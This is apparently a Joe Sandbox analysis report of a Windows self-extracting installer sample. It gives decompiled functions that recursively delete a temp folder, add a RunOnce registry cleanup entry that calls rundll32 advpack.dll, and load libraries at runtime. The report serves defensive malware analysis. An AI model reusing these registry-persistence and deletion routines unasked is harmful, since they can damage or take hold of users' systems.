                                                                                                                                                                                                          • Part of subcall function 00DE51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00DE2F4D,?,00000002,00000000), ref: 00DE5201
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                        • API String ID: 2126469477-2364573593
                                                                                                                                                                                                        • Opcode ID: 5d5ea896da9afda0dd569b4c2ce0032242e64f2642960967b7dc670b52b7fb36
                                                                                                                                                                                                        • Instruction ID: 66cc4d9e79eba397a3ddb3d5389832e6f97e3fc546d39357e7da003b2e9b1507
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d5ea896da9afda0dd569b4c2ce0032242e64f2642960967b7dc670b52b7fb36
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B419C30A007C59ADB30BF77AD8967A77A8EF54794F080079A945CB291EB74CE84CA71
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00DE2390(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v280;
                                                                                                                                                                                                        				char _v284;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        				int _t36;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                        				_t21 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                        				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                        				_t65 = __ecx;
                                                                                                                                                                                                        				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_pop(_t62);
                                                                                                                                                                                                        					_pop(_t66);
                                                                                                                                                                                                        					_pop(_t46);
                                                                                                                                                                                                        					return E00DE6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00DE1680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                        					_t58 = 0x104;
                                                                                                                                                                                                        					E00DE16B3( &_v280, 0x104, "*");
                                                                                                                                                                                                        					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                        					_t63 = _t22;
                                                                                                                                                                                                        					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t58 = 0x104;
                                                                                                                                                                                                        						E00DE1680( &_v276, 0x104, _t65);
                                                                                                                                                                                                        						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                        							_t58 = 0x104;
                                                                                                                                                                                                        							E00DE16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                        							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                        							DeleteFileA( &_v280);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                        								E00DE16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                        								_t58 = 0x104;
                                                                                                                                                                                                        								E00DE658A( &_v280, 0x104, 0xde1140);
                                                                                                                                                                                                        								E00DE2390( &_v284);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                        					} while (_t36 != 0);
                                                                                                                                                                                                        					FindClose(_t63); // executed
                                                                                                                                                                                                        					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}






















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindFirstFileA.KERNELBASE(?,00DE8A3A,00DE11F4,00DE8A3A,00000000,?,?), ref: 00DE23F6
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00DE11F8), ref: 00DE2427
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00DE11FC), ref: 00DE243B
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00DE2495
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00DE24A3
                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00DE24AF
                                                                                                                                                                                                        • FindClose.KERNELBASE(00000000), ref: 00DE24BE
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(00DE8A3A), ref: 00DE24C5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836429354-0
                                                                                                                                                                                                        • Opcode ID: 825b736b77a3134b11140cc583efbd448899f0569b45e481124ca21a918c1cc6
                                                                                                                                                                                                        • Instruction ID: a51565cab4832fbdd449f773ac9b8631fc341e6094ad006f75700ad2dd4d29ba
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 825b736b77a3134b11140cc583efbd448899f0569b45e481124ca21a918c1cc6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC316F326047C19BD320FB69CC89AEB77ACAFD4315F04492DB599C6290EB74A90D8772
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                                        			E00DE2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				intOrPtr _t7;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				struct HINSTANCE__* _t12;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				signed char _t19;
                                                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t4 = GetVersion();
                                                                                                                                                                                                        				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                        					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t17 = _t21;
                                                                                                                                                                                                        							 *0xdea288(0, 1, 0, 0);
                                                                                                                                                                                                        							 *_t21();
                                                                                                                                                                                                        							_t29 = _t24 - _t24;
                                                                                                                                                                                                        							if(_t24 != _t24) {
                                                                                                                                                                                                        								_t17 = 4;
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t20 = _a12;
                                                                                                                                                                                                        				_t18 = _a4;
                                                                                                                                                                                                        				 *0xde9124 = 0;
                                                                                                                                                                                                        				if(E00DE2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                        					_t9 = E00DE2F1D(_t18, _t20); // executed
                                                                                                                                                                                                        					_t22 = _t9; // executed
                                                                                                                                                                                                        					E00DE52B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                        					if(_t22 != 0) {
                                                                                                                                                                                                        						_t32 =  *0xde8a3a; // 0x0
                                                                                                                                                                                                        						if(_t32 == 0) {
                                                                                                                                                                                                        							_t19 =  *0xde9a2c; // 0x0
                                                                                                                                                                                                        							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                        								E00DE1F90(_t19, _t21, _t22);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t6 =  *0xde8588; // 0x0
                                                                                                                                                                                                        				if(_t6 != 0) {
                                                                                                                                                                                                        					CloseHandle(_t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 =  *0xde9124; // 0x0
                                                                                                                                                                                                        				return _t7;
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,00DE6BB0,00DE0000,00000000,00000002,0000000A), ref: 00DE2C03
                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00DE6BB0,00DE0000,00000000,00000002,0000000A), ref: 00DE2C18
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00DE2C28
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00DE6BB0,00DE0000,00000000,00000002,0000000A), ref: 00DE2C98
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                        • API String ID: 62482547-3460614246
                                                                                                                                                                                                        • Opcode ID: 1966205c8556846975aab7a8bd750243b4ede3c23a9a37bdd4244315c4872b31
                                                                                                                                                                                                        • Instruction ID: 46e688de6ab5a2cd98954d6e08ea2870216221fc5e4e30784ff0248c3ac3035c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1966205c8556846975aab7a8bd750243b4ede3c23a9a37bdd4244315c4872b31
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA11C2712403C69BD7207BBBECC9A7E776DDB84390B290025F905EB355DA70EC418675
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE6F40() {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(E00DE6EF0); // executed
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x00de6f45
                                                                                                                                                                                                        0x00de6f4d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00DE6F45
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                        • Opcode ID: b2794989be34a55729d1f746dc5867d2781de239e5fc11d44d9dbadd3ed44829
                                                                                                                                                                                                        • Instruction ID: b1eb889bc64f2b04dd0199af9e7e9fdaa339551153aed773560805569913ef70
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2794989be34a55729d1f746dc5867d2781de239e5fc11d44d9dbadd3ed44829
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D59002642513814B96103B759D5942579915A6EA42B819460B011C85D4DB6090445532
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%


                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00DE202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v528;
                                                                                                                                                                                                        				void* _v532;
                                                                                                                                                                                                        				int _v536;
                                                                                                                                                                                                        				int _v540;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                                        				long _t41;
                                                                                                                                                                                                        				struct HINSTANCE__* _t46;
                                                                                                                                                                                                        				intOrPtr _t49;
                                                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                                                        				CHAR* _t54;
                                                                                                                                                                                                        				void _t56;
                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                        				intOrPtr* _t72;
                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                        				intOrPtr* _t81;
                                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				void* _t90;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                        				signed int _t93;
                                                                                                                                                                                                        				void* _t94;
                                                                                                                                                                                                        				void* _t95;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t79 = __edx;
                                                                                                                                                                                                        				_t28 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                        				_t84 = 0x104;
                                                                                                                                                                                                        				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                        				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                        				_t95 = _t94 + 0x18;
                                                                                                                                                                                                        				_t66 = 0;
                                                                                                                                                                                                        				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                        					L24:
                                                                                                                                                                                                        					return E00DE6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(_t86);
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					E00DE171E("wextract_cleanup3", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                        					_t95 = _t95 + 0x10;
                                                                                                                                                                                                        					_t41 = RegQueryValueExA(_v532, "wextract_cleanup3", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                        					if(_t41 != 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t87 = _t87 + 1;
                                                                                                                                                                                                        					if(_t87 < 0xc8) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t87 != 0xc8) {
                                                                                                                                                                                                        					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                        					_t79 = _t84;
                                                                                                                                                                                                        					E00DE658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                        					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                        					_t84 = _t46;
                                                                                                                                                                                                        					if(_t84 == 0) {
                                                                                                                                                                                                        						L10:
                                                                                                                                                                                                        						if(GetModuleFileNameA( *0xde9a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        							L17:
                                                                                                                                                                                                        							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                        							_pop(_t86);
                                                                                                                                                                                                        							goto L24;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						_t72 =  &_v268;
                                                                                                                                                                                                        						_t80 = _t72 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t49 =  *_t72;
                                                                                                                                                                                                        							_t72 = _t72 + 1;
                                                                                                                                                                                                        						} while (_t49 != 0);
                                                                                                                                                                                                        						_t73 = _t72 - _t80;
                                                                                                                                                                                                        						_t81 = 0xde91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t50 =  *_t81;
                                                                                                                                                                                                        							_t81 = _t81 + 1;
                                                                                                                                                                                                        						} while (_t50 != 0);
                                                                                                                                                                                                        						_t84 = _t73 + 0x50 + _t81 - 0xde91e5;
                                                                                                                                                                                                        						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xde91e5);
                                                                                                                                                                                                        						if(_t90 != 0) {
                                                                                                                                                                                                        							 *0xde8580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                        							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                        							if(_t66 == 0) {
                                                                                                                                                                                                        								_t54 = "%s /D:%s";
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\jones\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                        							E00DE171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                        							_t75 = _t90;
                                                                                                                                                                                                        							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                        							_t79 = _t23;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t56 =  *_t75;
                                                                                                                                                                                                        								_t75 = _t75 + 1;
                                                                                                                                                                                                        							} while (_t56 != 0);
                                                                                                                                                                                                        							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                        							RegSetValueExA(_v532, "wextract_cleanup3", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                        							RegCloseKey(_v532); // executed
                                                                                                                                                                                                        							_t36 = LocalFree(_t90);
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t79 = 0x4b5;
                                                                                                                                                                                                        						E00DE44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                        					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                        					FreeLibrary(_t84); // executed
                                                                                                                                                                                                        					if(_t91 == 0) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        						E00DE658A( &_v268, 0x104, 0xde1140);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                        				 *0xde8530 = _t66;
                                                                                                                                                                                                        				goto L23;
                                                                                                                                                                                                        			}


































                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00DE2050
                                                                                                                                                                                                        • memset.MSVCRT ref: 00DE205F
                                                                                                                                                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00DE208C
                                                                                                                                                                                                          • Part of subcall function 00DE171E: _vsnprintf.MSVCRT ref: 00DE1750
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00DE20C9
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00DE20EA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00DE2103
                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00DE2122
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00DE2134
                                                                                                                                                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00DE2144
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00DE215B
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00DE218C
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00DE21C1
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00DE21E4
                                                                                                                                                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00DE223D
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00DE2249
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00DE2250
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                        • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup3
                                                                                                                                                                                                        • API String ID: 178549006-1916111597
                                                                                                                                                                                                        • Opcode ID: bba55b13a430ac228d68545cc5eceb7de04bfb7906226d1016fce6a92365710a
                                                                                                                                                                                                        • Instruction ID: fb152023e905b4917375cea8eb818ec65741f076a92c4fd5d9f9ae1f86cc27d3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bba55b13a430ac228d68545cc5eceb7de04bfb7906226d1016fce6a92365710a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0510771A00395AFDB21BF66DC89FFA773CEB50700F0401A4FA49EA254DA719E498A70
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E00DE55A0(void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v265;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        				int _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t35;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				int _t40;
                                                                                                                                                                                                        				int _t44;
                                                                                                                                                                                                        				long _t48;
                                                                                                                                                                                                        				int _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				int _t54;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				char _t60;
                                                                                                                                                                                                        				int _t65;
                                                                                                                                                                                                        				char _t66;
                                                                                                                                                                                                        				int _t67;
                                                                                                                                                                                                        				int _t68;
                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                        				int _t70;
                                                                                                                                                                                                        				int _t71;
                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                        				int _t73;
                                                                                                                                                                                                        				CHAR* _t82;
                                                                                                                                                                                                        				CHAR* _t88;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                        				_t2 = E00DE468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                        				if(_t109 != 0) {
                                                                                                                                                                                                        					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                        					_t32 = E00DE468F(_t82, _t109, 1);
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                        						__eflags = _t33;
                                                                                                                                                                                                        						if(_t33 == 0) {
                                                                                                                                                                                                        							 *0xde9a30 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t109);
